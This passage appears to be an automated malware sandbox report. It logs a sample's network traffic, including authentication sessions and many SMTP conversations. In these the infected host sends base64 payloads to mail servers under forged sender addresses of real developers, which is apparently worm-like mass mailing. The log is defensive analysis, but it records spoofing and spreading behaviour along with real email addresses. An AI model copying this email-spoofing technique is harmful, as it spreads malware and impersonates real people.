16bd0f84684cc061<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAV9MJ3AnHToBuwg71AvkVKTpI+XYNefuBRV7Zn1q57iexeBZGRKzFCCPJdV6qZWERhdULuxx+wj5+CSik6BB4AdxS6KBsCc5NSs9ZLwrT9xEOwsf+3DtvNrTaMWco1cwKwVgNvzi0
2023-02-20 08:51:30 UTC	182	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 36 62 64 30 66 38 34 36 38 34 63 63 30 36 31 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 29Context: 16bd0f84684cc061
2023-02-20 08:51:30 UTC	182	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2023-02-20 08:51:30 UTC	182	IN	Data Raw: 4d 53 2d 43 56 3a 20 77 70 62 76 4d 47 39 64 5a 30 79 69 77 6e 61 33 36 51 37 66 48 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: wpbvMG9dZ0yiwna36Q7fHg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49756	20.90.156.32	443	C:\Users\user\Desktop\ .exe

Timestamp	kBytes transferred	Direction	Data
2023-02-20 08:51:48 UTC	182	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 36 34 30 32 64 62 37 65 64 38 31 31 34 31 63 0d 0a 0d 0a Data Ascii: CNT 1 CON 246Context: 96402db7ed81141c
2023-02-20 08:51:48 UTC	182	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
2023-02-20 08:51:48 UTC	182	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 36 34 30 32 64 62 37 65 64 38 31 31 34 31 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 39 4d 4a 33 41 6e 48 54 6f 42 75 77 67 37 31 41 76 6b 56 4b 54 70 49 2b 58 59 4e 65 66 75 42 52 56 37 5a 6e 31 71 35 37 69 65 78 65 42 5a 47 52 4b 7a 46 43 43 50 4a 64 56 36 71 5a 57 45 52 68 64 55 4c 75 78 78 2b 77 6a 35 2b 43 53 69 6b 36 42 42 34 41 64 78 53 36 4b 42 73 43 63 35 4e 53 73 39 5a 4c 77 72 54 39 78 45 4f 77 73 66 2b 33 44 74 76 4e 72 54 61 4d 57 63 6f 31 63 77 4b 77 56 67 4e 76 7a 69 30 Data Ascii: ATH 2 CON\DEVICE 1026Context: 96402db7ed81141c<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAV9MJ3AnHToBuwg71AvkVKTpI+XYNefuBRV7Zn1q57iexeBZGRKzFCCPJdV6qZWERhdULuxx+wj5+CSik6BB4AdxS6KBsCc5NSs9ZLwrT9xEOwsf+3DtvNrTaMWco1cwKwVgNvzi0
2023-02-20 08:51:48 UTC	184	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 36 34 30 32 64 62 37 65 64 38 31 31 34 31 63 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 29Context: 96402db7ed81141c
2023-02-20 08:51:48 UTC	184	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2023-02-20 08:51:48 UTC	184	IN	Data Raw: 4d 53 2d 43 56 3a 20 67 5a 50 74 38 46 6a 43 50 6b 71 61 4a 34 69 45 72 4e 70 7a 7a 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: gZPt8FjCPkqaJ4iErNpzzA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49783	20.90.156.32	443	C:\Users\user\Desktop\ .exe

Timestamp	kBytes transferred	Direction	Data
2023-02-20 08:52:10 UTC	184	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 61 62 34 63 63 30 35 63 64 65 39 30 37 37 38 0d 0a 0d 0a Data Ascii: CNT 1 CON 246Context: eab4cc05cde90778
2023-02-20 08:52:10 UTC	184	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
2023-02-20 08:52:10 UTC	184	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 61 62 34 63 63 30 35 63 64 65 39 30 37 37 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 39 4d 4a 33 41 6e 48 54 6f 42 75 77 67 37 31 41 76 6b 56 4b 54 70 49 2b 58 59 4e 65 66 75 42 52 56 37 5a 6e 31 71 35 37 69 65 78 65 42 5a 47 52 4b 7a 46 43 43 50 4a 64 56 36 71 5a 57 45 52 68 64 55 4c 75 78 78 2b 77 6a 35 2b 43 53 69 6b 36 42 42 34 41 64 78 53 36 4b 42 73 43 63 35 4e 53 73 39 5a 4c 77 72 54 39 78 45 4f 77 73 66 2b 33 44 74 76 4e 72 54 61 4d 57 63 6f 31 63 77 4b 77 56 67 4e 76 7a 69 30 Data Ascii: ATH 2 CON\DEVICE 1026Context: eab4cc05cde90778<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAV9MJ3AnHToBuwg71AvkVKTpI+XYNefuBRV7Zn1q57iexeBZGRKzFCCPJdV6qZWERhdULuxx+wj5+CSik6BB4AdxS6KBsCc5NSs9ZLwrT9xEOwsf+3DtvNrTaMWco1cwKwVgNvzi0
2023-02-20 08:52:10 UTC	185	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 61 62 34 63 63 30 35 63 64 65 39 30 37 37 38 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 29Context: eab4cc05cde90778
2023-02-20 08:52:10 UTC	185	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2023-02-20 08:52:10 UTC	185	IN	Data Raw: 4d 53 2d 43 56 3a 20 45 2b 32 78 7a 2b 74 53 54 30 2b 34 56 6d 47 45 6a 4f 77 67 49 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: E+2xz+tST0+4VmGEjOwgIw.0Payload parsing failed.

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Feb 20, 2023 09:50:34.380933046 CET	25	49702	98.136.96.91	192.168.2.5	220 mtaproxy312.free.mail.ne1.yahoo.com ESMTP ready
Feb 20, 2023 09:50:34.385436058 CET	49702	25	192.168.2.5	98.136.96.91	EHLO yahoo.com
Feb 20, 2023 09:50:34.519920111 CET	25	49702	98.136.96.91	192.168.2.5	250-mtaproxy312.free.mail.ne1.yahoo.com 250-PIPELINING 250-SIZE 41943040 250-8BITMIME 250 STARTTLS
Feb 20, 2023 09:50:34.525001049 CET	49702	25	192.168.2.5	98.136.96.91	MAIL FROM:<jamainlbbbsdef@yahoo.com>
Feb 20, 2023 09:50:34.661086082 CET	25	49702	98.136.96.91	192.168.2.5	553 5.7.2 [TSS09] All messages from 84.17.52.8 will be permanently deferred; Retrying will NOT succeed. See https://postmaster.yahooinc.com/error-codes
Feb 20, 2023 09:50:35.607467890 CET	25	49703	85.187.148.2	192.168.2.5	220-az1-ss24.a2hosting.com ESMTP Exim 4.95 #2 Mon, 20 Feb 2023 01:50:35 -0700 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Feb 20, 2023 09:50:35.641434908 CET	49703	25	192.168.2.5	85.187.148.2	EHLO gzip.org
Feb 20, 2023 09:50:35.798612118 CET	25	49704	104.47.66.10	192.168.2.5	220 MW2NAM12FT016.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Mon, 20 Feb 2023 08:50:35 +0000
Feb 20, 2023 09:50:35.803085089 CET	25	49703	85.187.148.2	192.168.2.5	250-az1-ss24.a2hosting.com Hello gzip.org [84.17.52.8] 250-SIZE 78643200 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Feb 20, 2023 09:50:35.814343929 CET	49704	25	192.168.2.5	104.47.66.10	EHLO alumni.caltech.edu
Feb 20, 2023 09:50:35.818295956 CET	49703	25	192.168.2.5	85.187.148.2	MAIL FROM:<freetype-devel@nongnu.org>
Feb 20, 2023 09:50:35.980067015 CET	25	49703	85.187.148.2	192.168.2.5	250 OK
Feb 20, 2023 09:50:35.980484009 CET	49703	25	192.168.2.5	85.187.148.2	RCPT TO:<jloup@gzip.org>
Feb 20, 2023 09:50:35.983009100 CET	25	49704	104.47.66.10	192.168.2.5	250-MW2NAM12FT016.mail.protection.outlook.com Hello [84.17.52.8] 250-SIZE 157286400 250-PIPELINING 250-DSN 250-ENHANCEDSTATUSCODES 250-STARTTLS 250-8BITMIME 250-BINARYMIME 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:50:35.988339901 CET	49704	25	192.168.2.5	104.47.66.10	MAIL FROM:<jamainlbbbsdef@yahoo.com>
Feb 20, 2023 09:50:36.157299995 CET	25	49704	104.47.66.10	192.168.2.5	250 2.1.0 Sender OK
Feb 20, 2023 09:50:36.159878969 CET	49704	25	192.168.2.5	104.47.66.10	RCPT TO:<madler@alumni.caltech.edu>
Feb 20, 2023 09:50:36.305505037 CET	25	49703	85.187.148.2	192.168.2.5	250 Accepted
Feb 20, 2023 09:50:36.306385994 CET	49703	25	192.168.2.5	85.187.148.2	DATA
Feb 20, 2023 09:50:36.322045088 CET	25	49705	142.250.27.26	192.168.2.5	220 mx.google.com ESMTP d11-20020aa7d5cb000000b004acbba8412fsi2479636eds.438 - gsmtp
Feb 20, 2023 09:50:36.324975967 CET	49705	25	192.168.2.5	142.250.27.26	EHLO cryptsoft.com
Feb 20, 2023 09:50:36.329412937 CET	25	49704	104.47.66.10	192.168.2.5	550 5.7.606 Access denied, banned sending IP [84.17.52.8]. To request removal from this list please visit https://sender.office.com/ and follow the directions. For more information please go to http://go.microsoft.com/fwlink/?LinkID=526655 AS(1430) [MW2NAM12FT016.eop-nam12.prod.protection.outlook.com 2023-02-20T08:50:36.237Z 08DB1281E0D28B31]
Feb 20, 2023 09:50:36.358318090 CET	25	49705	142.250.27.26	192.168.2.5	250-mx.google.com at your service, [84.17.52.8] 250-SIZE 157286400 250-8BITMIME 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:50:36.375935078 CET	49705	25	192.168.2.5	142.250.27.26	MAIL FROM:<joeyadams3.14159@gmail.com>
Feb 20, 2023 09:50:36.406579018 CET	25	49705	142.250.27.26	192.168.2.5	250 2.1.0 OK d11-20020aa7d5cb000000b004acbba8412fsi2479636eds.438 - gsmtp
Feb 20, 2023 09:50:36.408811092 CET	49705	25	192.168.2.5	142.250.27.26	RCPT TO:<eay@cryptsoft.com>
Feb 20, 2023 09:50:36.450522900 CET	25	49705	142.250.27.26	192.168.2.5	550-5.1.1 The email account that you tried to reach does not exist. Please try 550-5.1.1 double-checking the recipient's email address for typos or 550-5.1.1 unnecessary spaces. Learn more at 550 5.1.1 https://support.google.com/mail/?p=NoSuchUser d11-20020aa7d5cb000000b004acbba8412fsi2479636eds.438 - gsmtp
Feb 20, 2023 09:50:36.467972040 CET	25	49703	85.187.148.2	192.168.2.5	354 Enter message, ending with "." on a line by itself
Feb 20, 2023 09:50:36.920476913 CET	25	49706	142.250.27.26	192.168.2.5	220 mx.google.com ESMTP 22-20020a170906209600b008b1294f6865si17622854ejq.171 - gsmtp
Feb 20, 2023 09:50:36.943886042 CET	49706	25	192.168.2.5	142.250.27.26	EHLO cryptsoft.com
Feb 20, 2023 09:50:36.975263119 CET	25	49706	142.250.27.26	192.168.2.5	250-mx.google.com at your service, [84.17.52.8] 250-SIZE 157286400 250-8BITMIME 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:50:36.986596107 CET	49706	25	192.168.2.5	142.250.27.26	MAIL FROM:<ran234@gmail.com>
Feb 20, 2023 09:50:37.017268896 CET	25	49706	142.250.27.26	192.168.2.5	250 2.1.0 OK 22-20020a170906209600b008b1294f6865si17622854ejq.171 - gsmtp
Feb 20, 2023 09:50:37.020998001 CET	49706	25	192.168.2.5	142.250.27.26	RCPT TO:<tjh@cryptsoft.com>
Feb 20, 2023 09:50:37.168406963 CET	25	49706	142.250.27.26	192.168.2.5	250 2.1.5 OK 22-20020a170906209600b008b1294f6865si17622854ejq.171 - gsmtp
Feb 20, 2023 09:50:37.172370911 CET	49706	25	192.168.2.5	142.250.27.26	DATA
Feb 20, 2023 09:50:37.203160048 CET	25	49706	142.250.27.26	192.168.2.5	354 Go ahead 22-20020a170906209600b008b1294f6865si17622854ejq.171 - gsmtp
Feb 20, 2023 09:50:39.453938961 CET	49706	25	192.168.2.5	142.250.27.26	314csnGcVA+CP5M1r7Ix08 vYHHQk515zMshvxbXfNAMWMAtDnMZCe/gAdYHB1OLE+MfywDVgJcaBCAnZMyjraMbPyKTv3m rLHjB/XRy6QCJORANM5O07XcQn1YDB7R8Tv+YwfJxmoexE
Feb 20, 2023 09:50:39.855267048 CET	25	49707	209.51.188.92	192.168.2.5	220 eggs.gnu.org ESMTP Exim 4.90_1 Trisquel Mon, 20 Feb 2023 03:50:39 -0500
Feb 20, 2023 09:50:39.965100050 CET	49707	25	192.168.2.5	209.51.188.92	EHLO nongnu.org
Feb 20, 2023 09:50:40.073410988 CET	25	49707	209.51.188.92	192.168.2.5	250-eggs.gnu.org Hello nongnu.org [84.17.52.8] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-STARTTLS 250-PRDR 250 HELP
Feb 20, 2023 09:50:41.395706892 CET	49707	25	192.168.2.5	209.51.188.92	MAIL FROM:<mokhin@bog.msu.ru>
Feb 20, 2023 09:50:41.500264883 CET	25	49707	209.51.188.92	192.168.2.5	250 OK
Feb 20, 2023 09:50:41.514558077 CET	49707	25	192.168.2.5	209.51.188.92	RCPT TO:<freetype@nongnu.org>
Feb 20, 2023 09:50:42.486725092 CET	25	49709	142.250.102.26	192.168.2.5	220 mx.google.com ESMTP r14-20020a056402034e00b004ad0993e54esi12627359edw.487 - gsmtp
Feb 20, 2023 09:50:42.491756916 CET	49709	25	192.168.2.5	142.250.102.26	EHLO kinoho.net
Feb 20, 2023 09:50:42.524015903 CET	25	49709	142.250.102.26	192.168.2.5	250-mx.google.com at your service, [84.17.52.8] 250-SIZE 157286400 250-8BITMIME 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:50:42.539316893 CET	49709	25	192.168.2.5	142.250.102.26	MAIL FROM:<ran234@gmail.com>
Feb 20, 2023 09:50:42.569519043 CET	25	49709	142.250.102.26	192.168.2.5	250 2.1.0 OK r14-20020a056402034e00b004ad0993e54esi12627359edw.487 - gsmtp
Feb 20, 2023 09:50:42.582802057 CET	49709	25	192.168.2.5	142.250.102.26	RCPT TO:<greg@kinoho.net>
Feb 20, 2023 09:50:42.679457903 CET	25	49708	209.51.188.92	192.168.2.5	220 eggs.gnu.org ESMTP Exim 4.90_1 Trisquel Mon, 20 Feb 2023 03:50:42 -0500
Feb 20, 2023 09:50:42.701781034 CET	49708	25	192.168.2.5	209.51.188.92	EHLO nongnu.org
Feb 20, 2023 09:50:42.726948977 CET	25	49709	142.250.102.26	192.168.2.5	250 2.1.5 OK r14-20020a056402034e00b004ad0993e54esi12627359edw.487 - gsmtp
Feb 20, 2023 09:50:42.737653971 CET	49709	25	192.168.2.5	142.250.102.26	DATA
Feb 20, 2023 09:50:42.767990112 CET	25	49709	142.250.102.26	192.168.2.5	354 Go ahead r14-20020a056402034e00b004ad0993e54esi12627359edw.487 - gsmtp
Feb 20, 2023 09:50:42.809860945 CET	25	49708	209.51.188.92	192.168.2.5	250-eggs.gnu.org Hello nongnu.org [84.17.52.8] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-STARTTLS 250-PRDR 250 HELP
Feb 20, 2023 09:50:42.857924938 CET	25	49710	142.250.27.27	192.168.2.5	220 mx.google.com ESMTP u19-20020aa7d553000000b004ad7c1ed6b4si699050edr.285 - gsmtp
Feb 20, 2023 09:50:42.865360975 CET	49708	25	192.168.2.5	209.51.188.92	MAIL FROM:<currojerez@riseup.net>
Feb 20, 2023 09:50:42.887559891 CET	49710	25	192.168.2.5	142.250.27.27	EHLO gmail.com
Feb 20, 2023 09:50:42.919519901 CET	25	49710	142.250.27.27	192.168.2.5	250-mx.google.com at your service, [84.17.52.8] 250-SIZE 157286400 250-8BITMIME 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:50:42.970088005 CET	25	49708	209.51.188.92	192.168.2.5	250 OK
Feb 20, 2023 09:50:42.972445965 CET	49708	25	192.168.2.5	209.51.188.92	RCPT TO:<freetype-devel@nongnu.org>
Feb 20, 2023 09:50:42.975116014 CET	49710	25	192.168.2.5	142.250.27.27	MAIL FROM:<tjh@cryptsoft.com>
Feb 20, 2023 09:50:43.005475044 CET	25	49710	142.250.27.27	192.168.2.5	250 2.1.0 OK u19-20020aa7d553000000b004ad7c1ed6b4si699050edr.285 - gsmtp
Feb 20, 2023 09:50:43.021646023 CET	49710	25	192.168.2.5	142.250.27.27	RCPT TO:<ran234@gmail.com>
Feb 20, 2023 09:50:43.284447908 CET	25	49710	142.250.27.27	192.168.2.5	250 2.1.5 OK u19-20020aa7d553000000b004ad7c1ed6b4si699050edr.285 - gsmtp
Feb 20, 2023 09:50:43.298609972 CET	49710	25	192.168.2.5	142.250.27.27	DATA
Feb 20, 2023 09:50:43.328938961 CET	25	49710	142.250.27.27	192.168.2.5	354 Go ahead u19-20020aa7d553000000b004ad7c1ed6b4si699050edr.285 - gsmtp
Feb 20, 2023 09:50:43.463087082 CET	25	49711	198.252.153.129	192.168.2.5	220-mx1.riseup.net ESMTP (spam is not appreciated)
Feb 20, 2023 09:50:43.802683115 CET	25	49708	209.51.188.92	192.168.2.5	550-[SPF] 84.17.52.8 is not allowed to send mail from riseup.net. Please see 550 http://www.openspf.org/Why?scope=mfrom;identity=currojerez@riseup.net;ip=84.17.52.8
Feb 20, 2023 09:50:43.827877045 CET	25	49712	142.250.27.27	192.168.2.5	220 mx.google.com ESMTP v20-20020aa7d654000000b004ab16936f7bsi1159060edr.405 - gsmtp
Feb 20, 2023 09:50:43.863421917 CET	49712	25	192.168.2.5	142.250.27.27	EHLO gmail.com
Feb 20, 2023 09:50:43.898657084 CET	25	49712	142.250.27.27	192.168.2.5	250-mx.google.com at your service, [84.17.52.8] 250-SIZE 157286400 250-8BITMIME 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:50:43.921473980 CET	49712	25	192.168.2.5	142.250.27.27	MAIL FROM:<madler@alumni.caltech.edu>
Feb 20, 2023 09:50:43.951838017 CET	25	49712	142.250.27.27	192.168.2.5	250 2.1.0 OK v20-20020aa7d654000000b004ab16936f7bsi1159060edr.405 - gsmtp
Feb 20, 2023 09:50:43.955754995 CET	25	49708	209.51.188.92	192.168.2.5	421 eggs.gnu.org lost input connection
Feb 20, 2023 09:50:43.984460115 CET	49712	25	192.168.2.5	142.250.27.27	RCPT TO:<joeyadams3.14159@gmail.com>
Feb 20, 2023 09:50:44.241847038 CET	25	49712	142.250.27.27	192.168.2.5	250 2.1.5 OK v20-20020aa7d654000000b004ab16936f7bsi1159060edr.405 - gsmtp
Feb 20, 2023 09:50:44.251492977 CET	49712	25	192.168.2.5	142.250.27.27	DATA
Feb 20, 2023 09:50:44.281905890 CET	25	49712	142.250.27.27	192.168.2.5	354 Go ahead v20-20020aa7d654000000b004ab16936f7bsi1159060edr.405 - gsmtp
Feb 20, 2023 09:50:44.849827051 CET	25	49713	94.100.180.31	192.168.2.5	220 mxs.mail.ru ESMTP ready
Feb 20, 2023 09:50:44.860672951 CET	49713	25	192.168.2.5	94.100.180.31	EHLO mail.ru
Feb 20, 2023 09:50:44.924978971 CET	25	49713	94.100.180.31	192.168.2.5	250-mxs.mail.ru 250-SIZE 73400320 250-8BITMIME 250-DSN 250 STARTTLS
Feb 20, 2023 09:50:44.955039024 CET	49713	25	192.168.2.5	94.100.180.31	MAIL FROM:<greg@kinoho.net>
Feb 20, 2023 09:50:45.017745018 CET	25	49713	94.100.180.31	192.168.2.5	250 2.0.0 OK
Feb 20, 2023 09:50:45.020688057 CET	49713	25	192.168.2.5	94.100.180.31	RCPT TO:<lastguru@mail.ru>
Feb 20, 2023 09:50:45.083722115 CET	25	49713	94.100.180.31	192.168.2.5	250 Go ahead
Feb 20, 2023 09:50:45.086901903 CET	49713	25	192.168.2.5	94.100.180.31	DATA
Feb 20, 2023 09:50:45.148924112 CET	25	49713	94.100.180.31	192.168.2.5	354 Go ahead. End your data with <CR><LF>.<CR><LF>
Feb 20, 2023 09:50:45.517591953 CET	49712	25	192.168.2.5	142.250.27.27	677FB/jLsvBIvJCQmTLSHcQKkMIdAQJx EpQU0bRhCLYgO3jumVe1LFYkWOA1BVwGL+SWES4uBzPmK524FuhNAV0O6gGI9Gka2WvgM5Ln iQRDFRQ
Feb 20, 2023 09:50:46.891890049 CET	25	49703	85.187.148.2	192.168.2.5	250 OK id=1pU1sa-00873r-CH
Feb 20, 2023 09:50:46.915669918 CET	49703	25	192.168.2.5	85.187.148.2	QUIT
Feb 20, 2023 09:50:47.278404951 CET	25	49703	85.187.148.2	192.168.2.5	221 az1-ss24.a2hosting.com closing connection
Feb 20, 2023 09:50:47.732810020 CET	49713	25	192.168.2.5	94.100.180.31	216gaP9R94TjPEvai2MPisF69I9M8MZdXyNRvsRtfBotYVv8PcW7A3F RgHF2YmdpwwgDvT+cwukH3OxceD8dD/NRxc6N9MpZu2MUV8pQXUQCHQYDujquMXG6z7Bzy2F /yVE3AwFeJjMzMmTqGsATCQEhdJ0S0fGNDO/MovAB/oEci0o99kwYXQIACvRiAdHSXX6D4vI weB0BnkQypqCRpoFdAbzq8s6BiOeSvI+X6ZTicOZdDKQXIsvw0QLw8wAWuaaV6zQ4XNNEE
Feb 20, 2023 09:50:47.979017973 CET	25	49706	142.250.27.26	192.168.2.5	550-5.7.1 [84.17.52.8] The IP you're using to send mail is not authorized to 550-5.7.1 send email directly to our servers. Please use the SMTP relay at your 550-5.7.1 service provider instead. Learn more at 550 5.7.1 https://support.google.com/mail/?p=NotAuthorizedError 22-20020a170906209600b008b1294f6865si17622854ejq.171 - gsmtp
Feb 20, 2023 09:50:48.053451061 CET	49706	25	192.168.2.5	142.250.27.26	QUIT
Feb 20, 2023 09:50:48.593342066 CET	49712	25	192.168.2.5	142.250.27.27	4792GbDQHt4iRhOCB9K40R7Jh1OIycWNPz 7AUjXIhEicMD/g91duqYnuwIIQvrMfQX7SvJlbehMgshGSk9NmeYLOuF
Feb 20, 2023 09:50:49.222243071 CET	25	49711	198.252.153.129	192.168.2.5	220 mx1.riseup.net ESMTP (spam is not appreciated)
Feb 20, 2023 09:50:49.232901096 CET	49711	25	192.168.2.5	198.252.153.129	EHLO riseup.net
Feb 20, 2023 09:50:49.411053896 CET	25	49711	198.252.153.129	192.168.2.5	250-mx1.riseup.net 250-PIPELINING 250-SIZE 25600000 250-ETRN 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250-SMTPUTF8 250 CHUNKING
Feb 20, 2023 09:50:49.453527927 CET	49711	25	192.168.2.5	198.252.153.129	MAIL FROM:<joeyadams3.14159@gmail.com>
Feb 20, 2023 09:50:49.550041914 CET	25	49707	209.51.188.92	192.168.2.5	451 Temporary DNS error while checking SPF record. Try again later.
Feb 20, 2023 09:50:49.646835089 CET	25	49711	198.252.153.129	192.168.2.5	250 2.1.0 Ok
Feb 20, 2023 09:50:49.649921894 CET	49711	25	192.168.2.5	198.252.153.129	RCPT TO:<currojerez@riseup.net>
Feb 20, 2023 09:50:49.666949987 CET	25	49707	209.51.188.92	192.168.2.5	421 eggs.gnu.org lost input connection
Feb 20, 2023 09:50:49.840749025 CET	25	49711	198.252.153.129	192.168.2.5	554 5.7.1 <riseup.net>: Helo command rejected: You are not in domain riseup.net
Feb 20, 2023 09:50:50.079505920 CET	25	49709	142.250.102.26	192.168.2.5	550-5.7.1 [84.17.52.8] The IP you're using to send mail is not authorized to 550-5.7.1 send email directly to our servers. Please use the SMTP relay at your 550-5.7.1 service provider instead. Learn more at 550 5.7.1 https://support.google.com/mail/?p=NotAuthorizedError r14-20020a056402034e00b004ad0993e54esi12627359edw.487 - gsmtp
Feb 20, 2023 09:50:50.133666039 CET	49709	25	192.168.2.5	142.250.102.26	QUIT
Feb 20, 2023 09:50:50.751966000 CET	25	49710	142.250.27.27	192.168.2.5	550-5.7.1 [84.17.52.8] The IP you're using to send mail is not authorized to 550-5.7.1 send email directly to our servers. Please use the SMTP relay at your 550-5.7.1 service provider instead. Learn more at 550 5.7.1 https://support.google.com/mail/?p=NotAuthorizedError u19-20020aa7d553000000b004ad7c1ed6b4si699050edr.285 - gsmtp
Feb 20, 2023 09:50:50.783380985 CET	49710	25	192.168.2.5	142.250.27.27	QUIT
Feb 20, 2023 09:50:51.084094048 CET	49713	25	192.168.2.5	94.100.180.31	.
Feb 20, 2023 09:50:51.093377113 CET	25	49712	142.250.27.27	192.168.2.5	550-5.7.1 [84.17.52.8] The IP you're using to send mail is not authorized to 550-5.7.1 send email directly to our servers. Please use the SMTP relay at your 550-5.7.1 service provider instead. Learn more at 550 5.7.1 https://support.google.com/mail/?p=NotAuthorizedError v20-20020aa7d654000000b004ab16936f7bsi1159060edr.405 - gsmtp
Feb 20, 2023 09:50:51.102802992 CET	49712	25	192.168.2.5	142.250.27.27	QUIT
